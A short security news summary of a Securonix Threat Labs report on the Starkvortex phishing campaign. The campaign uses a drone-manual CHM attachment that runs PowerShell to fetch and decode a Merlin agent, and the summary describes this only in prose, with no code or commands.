Starkvortex Cyber Attack Mechanism Exposed by securonix Threat Labs
The latest report from securonix Threat Labs delves into the intricacies of the Starkvortex cyber attack method. This innovative tactic utilizes drone management instructions to propagate the malicious Merlinagent.
The attack commences with the distribution of emails containing a seemingly harmless invitation to access a free manual management guide. The attachment, named “Information on BPLA for the military,” is a Microsoft certificate file (CHM). CHM files are commonly used to provide guidance on software usage and best practices.
Once the recipient opens the document, a malicious JavaScript code embedded within the HTML page is triggered, launching PowerShell. This code establishes a connection with a remote control server (C2) and initiates the downloading of compiled binary data.
The binary file is then processed using XOR and decoded, resulting in the assembly of the malicious Merlinagent payload. By establishing a connection with the C2 server, the attackers obtain full control over the targeted system.
Despite appearing straightforward, this attack method features complex technical implementation and obfuscation techniques, making detection challenging.
Researchers have observed that the files and documents employed in this attack successfully evade security measures, with antivirus scanners unable to identify the malicious CHM file. Typically, downloading Microsoft assistance files from the internet raises suspicion. However, the attackers have adeptly disguised their documents as innocuous guidelines or reference materials.
Upon successful infection, the attackers gain complete control over the victim’s system.